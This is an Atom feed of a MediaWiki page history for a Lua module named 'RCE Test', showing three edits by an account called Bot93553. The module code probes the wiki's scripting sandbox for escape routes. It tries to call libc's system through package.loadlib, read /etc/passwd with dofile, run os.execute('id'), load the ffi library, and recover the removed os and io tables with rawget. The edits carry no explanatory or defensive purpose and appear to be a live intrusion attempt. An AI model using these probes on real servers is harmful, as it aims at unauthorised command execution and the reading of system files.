<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="zh-Hans-CN">
	<id>http://120.55.36.65/w/index.php?action=history&amp;feed=atom&amp;title=%E6%A8%A1%E5%9D%97%3ARCE_Test</id>
	<title>模块:RCE Test - 版本历史</title>
	<link rel="self" type="application/atom+xml" href="http://120.55.36.65/w/index.php?action=history&amp;feed=atom&amp;title=%E6%A8%A1%E5%9D%97%3ARCE_Test"/>
	<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;action=history"/>
	<updated>2026-05-11T17:02:30Z</updated>
	<subtitle>本wiki上该页面的版本历史</subtitle>
	<generator>MediaWiki 1.40.0</generator>
	<entry>
		<id>http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;diff=829&amp;oldid=prev</id>
		<title>Bot93553：​sandbox probe v2</title>
		<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;diff=829&amp;oldid=prev"/>
		<updated>2026-05-08T15:04:31Z</updated>

		<summary type="html">&lt;p&gt;sandbox probe v2&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;zh-Hans-CN&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;←上一版本&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;2026年5月8日 (五) 23:04的版本&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot;&gt;第1行：&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;第1行：&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;−&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;local p = {}&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; &lt;/del&gt;function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;env&lt;/del&gt;() local &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;t &lt;/del&gt;= {}; for k,v in pairs(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;getfenv&lt;/del&gt;) do &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;t&lt;/del&gt;[&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;k&lt;/del&gt;] = &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;type&lt;/del&gt;(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;v&lt;/del&gt;)&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; end&lt;/del&gt;; return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;env_keys&lt;/del&gt;=' .. table.concat(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;t&lt;/del&gt;, ',') end&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; &lt;/del&gt;function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;ostest&lt;/del&gt;() local ok, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err &lt;/del&gt;= pcall(os.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;date&lt;/del&gt;); return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os_date&lt;/del&gt;=' .. tostring(ok) .. '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;/&lt;/del&gt;' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/del&gt;) end; function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;ffi&lt;/del&gt;() local ok, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err &lt;/del&gt;= pcall(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;require, 'ffi'&lt;/del&gt;); return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;ffi&lt;/del&gt;=' .. tostring(ok) .. '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;/&lt;/del&gt;' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/del&gt;) end&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; &lt;/del&gt;function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;loadlib&lt;/del&gt;() local ok, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err &lt;/del&gt;= pcall(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;package&lt;/del&gt;.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;loadlib&lt;/del&gt;, '/&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;lib&lt;/del&gt;/&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;libc.so.6&lt;/del&gt;', '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;system&lt;/del&gt;'); return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;loadlib&lt;/del&gt;=' .. tostring(ok) .. '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;/&lt;/del&gt;' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/del&gt;) end&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; &lt;/del&gt;function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;dofile&lt;/del&gt;() local ok, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err &lt;/del&gt;= pcall(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;dofile, '/etc/passwd'&lt;/del&gt;); return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;dofile&lt;/del&gt;=' .. tostring(ok) .. '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;/&lt;/del&gt;' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/del&gt;) end&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; &lt;/del&gt;function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;loadstring&lt;/del&gt;() local ok, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err &lt;/del&gt;= pcall(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;loadstring, 'return 1+1'&lt;/del&gt;); return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;loadstring&lt;/del&gt;=' .. tostring(ok) .. '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;/&lt;/del&gt;' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/del&gt;) end; function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;raw&lt;/del&gt;() local ok, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err &lt;/del&gt;= pcall(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;rawget&lt;/del&gt;, &lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;_G, 'os'&lt;/del&gt;); return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;rawget_os&lt;/del&gt;=' .. tostring(ok) .. '/' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/del&gt;) end&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;; &lt;/del&gt;return p&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;local p = {}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;oskeys&lt;/ins&gt;() local &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os = rawget(_G, 'os'); local keys &lt;/ins&gt;= {}; for k,v in pairs(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os&lt;/ins&gt;) do &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;keys&lt;/ins&gt;[&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;#keys+1&lt;/ins&gt;] = &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;k end; table.sort&lt;/ins&gt;(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;keys&lt;/ins&gt;); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os_keys&lt;/ins&gt;=&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;[&lt;/ins&gt;' .. table.concat(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;keys&lt;/ins&gt;, ',') &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;.. ']' &lt;/ins&gt;end&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;tryexec&lt;/ins&gt;() &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;local os = rawget(_G, 'os'); &lt;/ins&gt;local ok, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result &lt;/ins&gt;= pcall(os.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;execute, 'id'&lt;/ins&gt;); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;execute_ok&lt;/ins&gt;=' .. tostring(ok) .. ' &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result=&lt;/ins&gt;' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result&lt;/ins&gt;) end&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;function p.tryio() local io = rawget(_G, 'io')&lt;/ins&gt;; &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;return 'io_type=' .. type(io) end&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;trytmpname&lt;/ins&gt;() &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;local os = rawget(_G, 'os'); &lt;/ins&gt;local ok, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result &lt;/ins&gt;= pcall(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os.tmpname&lt;/ins&gt;); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;tmpname_ok&lt;/ins&gt;=' .. tostring(ok) .. ' &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result=&lt;/ins&gt;' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result&lt;/ins&gt;) end&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;tryrename&lt;/ins&gt;() &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;local os = rawget(_G, 'os'); &lt;/ins&gt;local ok, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result &lt;/ins&gt;= pcall(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os&lt;/ins&gt;.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;rename&lt;/ins&gt;, '/&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;tmp&lt;/ins&gt;/&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;test1&lt;/ins&gt;', '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;/tmp/test2&lt;/ins&gt;'); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;rename_ok&lt;/ins&gt;=' .. tostring(ok) .. ' &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result=&lt;/ins&gt;' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result&lt;/ins&gt;) end&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;tryclock&lt;/ins&gt;() &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;local os = rawget(_G, 'os'); &lt;/ins&gt;local ok, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result &lt;/ins&gt;= pcall(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os.clock&lt;/ins&gt;); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;clock_ok&lt;/ins&gt;=' .. tostring(ok) .. ' &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result=&lt;/ins&gt;' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result&lt;/ins&gt;) end&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;trytime&lt;/ins&gt;() &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;local os = rawget(_G, 'os'); &lt;/ins&gt;local ok, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result &lt;/ins&gt;= pcall(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;os.time&lt;/ins&gt;); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;time_ok&lt;/ins&gt;=' .. tostring(ok) .. ' &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result=&lt;/ins&gt;' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result) end&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;function p.enumglobals() local count = 0; for k,v in pairs(getfenv()&lt;/ins&gt;) &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;do count = count + 1 &lt;/ins&gt;end; &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;return 'global_count=' .. count end&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;trystringdump&lt;/ins&gt;() local ok, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result &lt;/ins&gt;= pcall(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;string.dump&lt;/ins&gt;, &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;function() end&lt;/ins&gt;); return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;dump_ok&lt;/ins&gt;=' .. tostring(ok) .. '/' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;result&lt;/ins&gt;) end&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;return p&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Bot93553</name></author>
	</entry>
	<entry>
		<id>http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;diff=828&amp;oldid=prev</id>
		<title>Bot93553：​RCE sandbox test</title>
		<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;diff=828&amp;oldid=prev"/>
		<updated>2026-05-08T15:03:43Z</updated>

		<summary type="html">&lt;p&gt;RCE sandbox test&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;zh-Hans-CN&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;←上一版本&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;2026年5月8日 (五) 23:03的版本&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot;&gt;第1行：&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;第1行：&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;−&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;local p = {}; function p.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;test&lt;/del&gt;() return '&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;hello_&lt;/del&gt;' .. tostring(&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;mw&lt;/del&gt;) end; return p&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;local p = {}; function p.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;env&lt;/ins&gt;() &lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;local t = {}; for k,v in pairs(getfenv) do t[k] = type(v); end; return 'env_keys=' .. table.concat(t, ',') end; function p.ostest() local ok, err = pcall(os.date); return 'os_date=' .. tostring(ok) .. '/' .. tostring(err) end; function p.ffi() local ok, err = pcall(require, 'ffi'); &lt;/ins&gt;return '&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;ffi=' .. tostring(ok) .. '/' .. tostring(err) end; function p.loadlib() local ok, err = pcall(package.loadlib, '/lib/libc.so.6', 'system'); return 'loadlib=' .. tostring(ok) .. '/' .. tostring(err) end; function p.dofile() local ok, err = pcall(dofile, '/etc/passwd'); return 'dofile=' .. tostring(ok) .. '/' .. tostring(err) end; function p.loadstring() local ok, err = pcall(loadstring, 'return 1+1'); return 'loadstring=' .. tostring(ok) .. '/' .. tostring(err) end; function p.raw() local ok, err = pcall(rawget, _G, 'os'); return 'rawget_os=' .. tostring(ok) .. '/&lt;/ins&gt;' .. tostring(&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;err&lt;/ins&gt;) end; return p&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Bot93553</name></author>
	</entry>
	<entry>
		<id>http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;diff=827&amp;oldid=prev</id>
		<title>Bot93553：​test</title>
		<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_Test&amp;diff=827&amp;oldid=prev"/>
		<updated>2026-05-08T15:02:53Z</updated>

		<summary type="html">&lt;p&gt;test&lt;/p&gt;
&lt;p&gt;&lt;b&gt;新页面&lt;/b&gt;&lt;/p&gt;&lt;div&gt;local p = {}; function p.test() return 'hello_' .. tostring(mw) end; return p&lt;/div&gt;</summary>
		<author><name>Bot93553</name></author>
	</entry>
</feed>